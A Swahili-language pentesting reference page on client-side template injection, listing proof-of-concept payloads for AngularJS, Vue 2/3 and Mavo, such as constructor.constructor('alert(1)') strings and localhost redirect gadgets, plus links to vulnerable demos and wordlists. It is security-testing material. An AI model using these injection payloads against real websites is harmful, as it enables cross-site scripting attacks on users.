Client Side Template Injection (CSTI)

Reading time: 4 minutes

Summary

Ni kama Server Side Template Injection lakini katika mteja. SSTI inaweza kukuruhusu kutekeleza msimbo kwenye seva ya mbali, CSTI inaweza kukuruhusu kutekeleza msimbo wa JavaScript wa kiholela katika kivinjari cha mwathirika.

Kujaribu udhaifu huu ni kama ilivyo katika kesi ya SSTI, mfasiri anatarajia kigezo na atakitekeleza. Kwa mfano, kwa payload kama {{ 7-7 }}, ikiwa programu ina udhaifu utaona 0, na ikiwa sivyo, utaona asili: {{ 7-7 }}

AngularJS

AngularJS ni mfumo maarufu wa JavaScript unaoshirikiana na HTML kupitia sifa zinazojulikana kama maagizo, moja maarufu ikiwa ng-app. Agizo hili linaruhusu AngularJS kushughulikia maudhui ya HTML, na kuwezesha utekelezaji wa maelekezo ya JavaScript ndani ya mabano mawili ya curly.

Katika hali ambapo input ya mtumiaji inaingizwa kwa nguvu katika mwili wa HTML ulio na lebo ng-app, inawezekana kutekeleza msimbo wa JavaScript wa kiholela. Hii inaweza kufanywa kwa kutumia sintaksia ya AngularJS ndani ya input. Hapa chini kuna mifano inayoonyesha jinsi msimbo wa JavaScript unaweza kutekelezwa:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

Unaweza kupata mfano wa msingi mtandaoni wa udhaifu katika AngularJS katika http://jsfiddle.net/2zs2yv7o/ na katika Burp Suite Academy

[!CAUTION] > Angular 1.6 iliondoa sandbox hivyo kuanzia toleo hili payload kama {{constructor.constructor('alert(1)')()}} au <input ng-focus=$event.view.alert('XSS')> inapaswa kufanya kazi.

VueJS

Unaweza kupata utekelezaji wa Vue wenye udhaifu katika https://vue-client-side-template-injection-example.azu.now.sh/
Payload inayofanya kazi: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%

Na msingi wa kanuni ya mfano wenye udhaifu hapa: https://github.com/azu/vue-client-side-template-injection-example

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

A really good post on CSTI in VUE can be found in https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets

V3

{{_openBlock.constructor('alert(1)')()}}

Mwandiko: Gareth Heyes, Lewis Ardern & PwnFunction

V2

{{constructor.constructor('alert(1)')()}}

Mshikamano: Mario Heiderich

Angalia zaidi VUE payloads katika https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected

Mavo

Payload:

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

Zaidi ya payloads katika https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations

Orodha ya Ugunduzi wa Brute-Force

{{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt {{#endref}}